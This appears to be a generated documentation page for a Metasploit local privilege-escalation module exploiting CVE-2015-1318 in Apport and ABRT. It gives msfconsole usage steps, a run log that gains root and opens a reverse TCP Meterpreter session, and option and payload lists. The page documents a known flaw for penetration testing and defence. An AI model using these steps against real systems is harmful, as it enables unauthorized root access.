Apport / ABRT chroot Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/apport_abrt_chroot_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apport / ABRT chroot Privilege Escalation
Module: exploit/linux/local/apport_abrt_chroot_priv_esc
Source code: modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb
Disclosure date: 2015-03-31
Last modification time: 2021-07-08 09:03:42 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-1318

This module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace ("container"). Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing usr/share/apport/apport within the crashed task's directory to be executed. Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing usr/libexec/abrt-hook-ccpp within the crashed task's directory to be executed. In both instances, the crash handler does not drop privileges, resulting in code execution as root. This module has been tested successfully on Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64 and ABRT on Fedora 19 and 20 x86_64.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
msf exploit(apport_abrt_chroot_priv_esc) > show targets
    ... a list of targets ...
msf exploit(apport_abrt_chroot_priv_esc) > set TARGET target-id
msf exploit(apport_abrt_chroot_priv_esc) > show options
    ... show and set options ...
msf exploit(apport_abrt_chroot_priv_esc) > set SESSION session-id
msf exploit(apport_abrt_chroot_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Ubuntu and Fedora systems by invoking the default coredump handler inside a namespace ("container").

Vulnerable Application


Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing usr/share/apport/apport within the crashed task's directory to be executed.

Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing usr/libexec/abrt-hook-ccpp within the crashed task's directory to be executed. Fedora's crash handler was reportedly configured to chroot ABRT by default between April and August 2014.

In both instances, the crash handler does not drop privileges, resulting in code execution as root.

This module has been tested successfully on:

  • Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 and x86_64
  • ABRT on Fedora 19 and 20 x86_64

To test Fedora 20, disable SELinux, reboot, and modify /proc/sys/kernel/core_pattern to make use of the vulnerable core_pattern : |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. Do: use exploit/linux/local/apport_abrt_chroot_priv_esc
  4. Do: set SESSION [SESSION]
  5. Do: check
  6. Do: run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

Scenarios


  msf > use exploit/linux/local/apport_abrt_chroot_priv_esc
  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/apport_abrt_chroot_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.244:4444 
  [*] Writing '/tmp/.drY6cJZ' (887316 bytes) ...
  [*] Writing '/tmp/.LtJvrgjXq' (207 bytes) ...
  [*] Launching exploit...
  [+] Upgraded session to root privileges ('uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare),1000(user)')
  [*] Sending stage (857352 bytes) to 172.16.191.252
  [*] Meterpreter session 2 opened (172.16.191.244:4444 -> 172.16.191.252:35552) at 2018-01-11 09:58:25 -0500
  [+] Deleted /tmp/.drY6cJZ
  [+] Deleted /tmp/.LtJvrgjXq

  meterpreter > getuid
  Server username: uid=0, gid=1000, euid=0, egid=1000
  meterpreter > sysinfo
  Computer     : 172.16.191.252
  OS           : Ubuntu 14.04 (Linux 3.13.0-32-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/local/apport_abrt_chroot_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/apport_abrt_chroot_priv_esc

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show info

       Name: Apport / ABRT chroot Privilege Escalation
     Module: exploit/linux/local/apport_abrt_chroot_priv_esc
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-03-31

Provided by:
  St��phane Graber
  Tavis Ormandy
  Ricardo F. Teixeira
  bcoles <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems by 
  invoking the default coredump handler inside a namespace 
  ("container"). Apport versions 2.13 through 2.17.x before 2.17.1 on 
  Ubuntu are vulnerable, due to a feature which allows forwarding 
  reports to a container's Apport by changing the root directory 
  before loading the crash report, causing `usr/share/apport/apport` 
  within the crashed task's directory to be executed. Similarly, 
  Fedora is vulnerable when the kernel crash handler is configured to 
  change root directory before executing ABRT, causing 
  `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to 
  be executed. In both instances, the crash handler does not drop 
  privileges, resulting in code execution as root. This module has 
  been tested successfully on Apport 2.14.1 on Ubuntu 14.04.1 LTS x86 
  and x86_64 and ABRT on Fedora 19 and 20 x86_64.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-1318
  http://www.openwall.com/lists/oss-security/2015/04/14/4
  https://www.exploit-db.com/exploits/36782
  https://www.exploit-db.com/exploits/36746
  https://gist.github.com/taviso/0f02c255c13c5c113406
  https://bugzilla.redhat.com/show_bug.cgi?id=1211223
  https://bugzilla.redhat.com/show_bug.cgi?id=1211835
  https://usn.ubuntu.com/usn/USN-2569-1/
  https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893
  https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
  http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943

Module Options


This is a complete list of options available in the linux/local/apport_abrt_chroot_priv_esc exploit:

msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show options

Module options (exploit/linux/local/apport_abrt_chroot_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/apport_abrt_chroot_priv_esc exploit:

msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show advanced

Module advanced options (exploit/linux/local/apport_abrt_chroot_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/apport_abrt_chroot_priv_esc module can exploit:

msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/apport_abrt_chroot_priv_esc exploit:

msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   5   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   6   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   7   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   8   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   9   payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   10  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   11  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   12  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   13  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   14  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   15  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   16  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   17  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   18  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   19  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   20  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   21  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   22  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   23  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   26  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   27  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   28  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   29  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   30  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   31  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   32  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   33  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   34  payload/linux/x86/read_file                                        normal  No     Linux Read File
   35  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   36  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   37  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   38  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   41  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   42  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   43  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   44  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   45  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   46  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   47  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   48  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/apport_abrt_chroot_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/apport_abrt_chroot_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unprivileged user namespaces are not permitted


Here is a relevant code snippet related to the "Unprivileged user namespaces are not permitted" error message:

78:	    datastore['WritableDir']
79:	  end
80:	
81:	  def check
82:	    unless userns_enabled?
83:	      vprint_error 'Unprivileged user namespaces are not permitted'
84:	      return CheckCode::Safe
85:	    end
86:	    vprint_good 'Unprivileged user namespaces are permitted'
87:	
88:	    kernel_version = Rex::Version.new kernel_release.split('-').first

Linux kernel version <KERNEL_VERSION> is not vulnerable


Here is a relevant code snippet related to the "Linux kernel version <KERNEL_VERSION> is not vulnerable" error message:

86:	    vprint_good 'Unprivileged user namespaces are permitted'
87:	
88:	    kernel_version = Rex::Version.new kernel_release.split('-').first
89:	
90:	    if kernel_version < Rex::Version.new('3.12')
91:	      vprint_error "Linux kernel version #{kernel_version} is not vulnerable"
92:	      return CheckCode::Safe
93:	    end
94:	    vprint_good "Linux kernel version #{kernel_version} is vulnerable"
95:	
96:	    kernel_core_pattern = read_file('/proc/sys/kernel/core_pattern').to_s

Could not determine Apport version. apport-cli is not installed or not in $PATH.


Here is a relevant code snippet related to the "Could not determine Apport version. apport-cli is not installed or not in $PATH." error message:

108:	    #   kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P
109:	    if kernel_core_pattern.include? 'apport'
110:	      vprint_good 'System is configured to use Apport for crash reporting'
111:	
112:	      unless command_exists?('apport-cli')
113:	        return CheckCode::Detected('Could not determine Apport version. apport-cli is not installed or not in $PATH.')
114:	      end
115:	
116:	      res = cmd_exec('apport-cli --version').to_s
117:	
118:	      if res.blank?

Could not determine Apport version


Here is a relevant code snippet related to the "Could not determine Apport version" error message:

114:	      end
115:	
116:	      res = cmd_exec('apport-cli --version').to_s
117:	
118:	      if res.blank?
119:	        return CheckCode::Detected('Could not determine Apport version')
120:	      end
121:	
122:	      apport_version = Rex::Version.new(res.split('-').first)
123:	
124:	      # apport 2.13 < 2.17.1

Apport version <APPORT_VERSION> is not vulnerable


Here is a relevant code snippet related to the "Apport version <APPORT_VERSION> is not vulnerable" error message:

125:	      if apport_version.between?(Rex::Version.new('2.13'), Rex::Version.new('2.17'))
126:	        vprint_good "Apport version #{apport_version} is vulnerable"
127:	        return CheckCode::Appears
128:	      end
129:	
130:	      vprint_error "Apport version #{apport_version} is not vulnerable"
131:	
132:	      return CheckCode::Safe
133:	    end
134:	
135:	    vprint_error 'System is not configured to use Apport or chroot ABRT for crash reporting'

System is not configured to use Apport or chroot ABRT for crash reporting


Here is a relevant code snippet related to the "System is not configured to use Apport or chroot ABRT for crash reporting" error message:

130:	      vprint_error "Apport version #{apport_version} is not vulnerable"
131:	
132:	      return CheckCode::Safe
133:	    end
134:	
135:	    vprint_error 'System is not configured to use Apport or chroot ABRT for crash reporting'
136:	
137:	    CheckCode::Safe
138:	  end
139:	
140:	  def upload_and_chmodx(path, data)

Session already has root privileges


Here is a relevant code snippet related to the "Session already has root privileges" error message:

145:	    register_file_for_cleanup path
146:	  end
147:	
148:	  def exploit
149:	    if is_root?
150:	      fail_with Failure::BadConfig, 'Session already has root privileges'
151:	    end
152:	
153:	    # Upload Tavis Ormandy's newpid exploit:
154:	    # - https://www.exploit-db.com/exploits/36746/
155:	    # Cross-compiled with:

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Stéphane Graber
  • Tavis Ormandy
  • Ricardo F. Teixeira
  • bcoles

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.